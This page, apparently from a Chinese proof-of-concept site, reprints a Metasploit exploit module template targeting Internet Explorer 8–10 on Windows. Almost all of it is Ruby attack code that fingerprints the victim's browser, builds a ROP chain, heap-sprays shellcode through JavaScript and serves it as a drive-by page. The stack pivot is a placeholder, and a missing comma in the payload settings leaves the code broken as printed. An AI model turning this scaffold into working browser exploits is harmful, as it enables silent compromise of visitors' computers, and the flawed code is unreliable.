当前位置:首页 > POC 2017年07月28日
Windows浏览器示例利用

此模板涵盖IE8 / 9/10,并使用用户代理HTTP头来检测浏览器版本。 请注意,IE8和更高版本可能会以兼容模式模拟较旧的IE版本,在这种情况下,模块将无法正确检测浏览器。 这是一个用于开发开发的Metasploit模块示例。


class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn
 
  # Set :classid and :method for ActiveX exploits. For example:
  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
  # :method     => "SetShapeNodeType",
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "8.0",
    :ua_maxver  => "10.0",
    :javascript => true,
    :os_name    => OperatingSystems::Match::WINDOWS,
    :rank       => NormalRanking
  })
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Module Name",
      'Description'    => %q{
        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
        the browser version.  Please note IE8 and newer may emulate an older IE version
        in compatibility mode, in that case the module won't be able to detect the
        browser correctly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00"# js_property_spray
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end
 
  def get_target(agent)
    return target if target.name != 'Automatic'
 
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
    ie_name = "IE #{ie}"
 
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    when '6.2'
      os_name = 'Windows 8'
    when '6.3'
      os_name = 'Windows 8.1'
    end
 
    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        return t
      end
    end
 
    nil
  end
 
  def get_payload(t)
    stack_pivot = "\x41\x42\x43\x44"
    code        = payload.encoded
 
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
 
    else
      print_status("Using JRE ROP")
      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    end
 
    rop_payload
  end
 
 
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    html = %Q|
      <script>
      #{js_property_spray}
 
      var s = unescape("#{js_p}");
      sprayHeap({shellcode:s});
      </script>
    |
 
    html.gsub(/^\t\t/, '')
  end
 
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")
 
    target = get_target(agent)
    if target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
 
    print_status("Target selected as: #{target.name}")
    html = get_html(target)
    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
  end
end



发表评论: